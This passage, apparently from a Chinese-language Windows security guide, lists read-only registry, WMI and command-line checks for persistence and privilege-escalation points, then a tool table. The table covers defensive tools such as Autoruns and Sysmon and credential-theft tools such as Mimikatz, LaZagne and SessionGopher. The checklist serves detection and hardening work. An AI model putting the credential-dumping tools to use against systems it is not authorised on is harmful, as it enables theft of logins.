Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding
# === BITS JOBS ===
bitsadmin /list /allusers /verbose
# === APPINIT DLLs ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs
# === LSA / SSP ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
# === AMSI PROVIDERS ===
reg query "HKLM\SOFTWARE\Microsoft\AMSI\Providers"
# === NETWORK PROVIDERS ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"
# === COM / HKCU OVERRIDES ===
reg query "HKCU\Software\Classes\CLSID" /s
# === COR_PROFILER ===
reg query "HKCU\Environment" /v COR_PROFILER_PATH
reg query "HKCU\Environment" /v COR_ENABLE_PROFILING
# === PRINT PROCESSORS ===
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors"
# === SHELL EXTENSIONS ===
reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"
# === CREDENTIAL PROVIDERS ===
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers"
# === WINSOCK LSP ===
netsh winsock show catalog
# === POWERSHELL PROFILE ===
cat "$HOME\Documents\WindowsPowerShell\profile.ps1"
# === USERS ===
net user
net localgroup "Administrators"
# === OBFUSCATED LOADER REGISTRY ===
reg query "HKCU\Software\Microsoft\WindowsUpdate"
reg query "HKCU\Software\Microsoft\Sync"
reg query "HKCU\Software\Microsoft\EdgeUpdate"
reg query "HKCU\Software\Microsoft\Cfg"
```
## 检测工具参考
| 工具 | 用途 |
|------|-----|
| **Autoruns (Sysinternals)** | 完整的持久化枚举 — 黄金标准 |
| **Process Monitor** | 实时注册表/文件写入;幽灵 DLL 搜寻 |
| **Sysmon** | 进程创建、注册表、DLL 加载、网络 |
| **PrivescCheck** | 自动化权限提升枚举 |
| **PowerUp** | PowerSploit 权限提升模块 |
| **SharpUp** | C# 权限提升 (AV 友好) |
| **LaZagne** | 多应用程序凭据恢复 |
| **SessionGopher** | 会话凭据收集 |
| **Mimikatz** | LSASS 凭据转储、哈希传递/票据传递 |
| **wes.py** | Windows Exploit Suggester (补丁差异分析) |
| **accesschk.exe** | 文件、目录、注册表、服务的权限审计 |
| **bitsadmin /list** | BITS 作业枚举 |
| **netsh winsock show catalog** | LSP DLL 枚举 |
标签:AI合规, APT攻击, ATT&CK框架, Conpot, DAST, Windows安全, 嗅探欺骗, 威胁情报, 客户端加密, 开发者工具, 恶意软件分析, 教程, 数据展示, 权限维持, 特权升级, 白皮书, 红队, 网络安全, 隐私保护